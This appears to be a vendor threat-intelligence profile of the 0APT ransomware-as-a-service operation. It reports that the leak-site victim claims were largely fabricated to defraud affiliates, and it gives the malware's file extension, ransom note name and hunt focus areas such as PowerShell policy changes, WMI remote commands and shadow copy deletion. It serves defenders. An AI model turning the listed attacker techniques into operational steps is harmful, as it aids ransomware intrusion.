0APT
0APT is a purported ransomware operation that surfaced on dark web forums in late January 2026, marketing itself as a Ransomware-as-a-Service (RaaS) with a professional-looking ecosystem (vanity TOR data leak site, RaaS panel, and negotiation chat). Multiple investigations (including GuidePoint Security, Halcyon, SOCRadar, THE RAVEN FILE, and Intel 471) assessed that 0APT’s claimed victim list and “stolen data” were largely fabricated—e.g., implausible multi-terabyte “file trees,” downloads that terminated after ~5 minutes, and samples that contained repeating null bytes—suggesting the operation was primarily designed to scam would-be affiliates (reportedly defrauding at least $85,000) rather than extort real organizations. Some named victims publicly denied compromise (e.g., Epworth HealthCare), and at least one listed entity was fictional (e.g., “Metropolis City Municipal”).
Despite the apparent fraud around breach claims, researchers who accessed the RaaS panel reported it could generate functional ransomware samples (up to five builds per affiliate account) for Windows, Linux, and macOS. Generated samples were described as Rust-compiled on Windows (~5.6MB) and ~1.3MB on Linux, using encryption algorithms including AES-256 and Salsa20/ChaCha, and referencing the Speck cipher. The ransomware appends the .0apt extension to encrypted files and drops a ransom note named README0apt.txt containing unique victim identifiers. Intel 471 reported an alleged 0APT malware sample but assessed it appeared to be a work in progress rather than fully operational ransomware, while noting a small possibility the actor was testing infrastructure/capabilities for future activity.
Known/mentioned indicators and behaviors from reporting include: file extension “.0apt”; ransom note “README0apt.txt”; and (as recommended hunt focus areas associated with claimed 0APT activity) suspicious PowerShell execution-policy changes to Unrestricted, PowerShell-based file download methods, WMI remote command attempts, nonstandard SMB communication/profiling, SMB share/admin share activity, WinRAR archive creation, and shadow copy deletion via OS utilities.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"Intel 471 discovered the alleged 0APT malware sample... technical analysis of the malicious file indicated it was more of a work in progress than a fully operational ransomware malware sample."
Recent activity
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
RaaS operation that provides functional cross-platform ransomware builders (Windows/Linux/macOS). Payloads append the .0apt extension and drop a ransom note (README0apt.txt) with unique victim identifiers. The operation’s leak site and claimed victim list appear largely fabricated, likely to defraud would-be affiliates, but the ransomware binaries themselves are described as functional and in circulation.
An alleged ransomware payload associated with the 0APT actor’s purported RaaS operation; reporting indicates the sample and supporting leak-site “proof” appear non-credible/fabricated and the malware may be incomplete or in development rather than an operational encryptor.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.